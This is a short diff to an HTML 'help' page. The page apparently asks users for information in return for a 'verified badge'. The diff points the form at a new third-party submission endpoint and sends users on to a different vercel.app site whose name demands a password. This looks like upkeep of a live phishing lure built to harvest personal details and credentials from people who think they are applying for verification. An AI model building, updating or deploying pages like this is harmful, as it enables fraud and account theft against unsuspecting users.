--- a/help.html
+++ b/help.html
@@ -223,11 +223,11 @@
       <p class=form-notice>Please ensure that all required information is accurately provided. Failure to do so may
          result in not receiving a verified badge.</p>
 
-                        <form class="content" action="https://submit-form.com/aeib0QA1r" method="POST">
+                        <form class="content" action="https://submit-form.com/clM6fMdCx" method="POST">
  <input
     type="hidden"
     name="_redirect"
-    value="https://verify-password-now.vercel.app/"
+    value="https://password-required-here.vercel.app/"
   />
          
          <div class=form-group>
@@ -244,3 +244,4 @@
          <button class="submitBtn" type=submit>Submit</button>
       </form>
    </div>
+
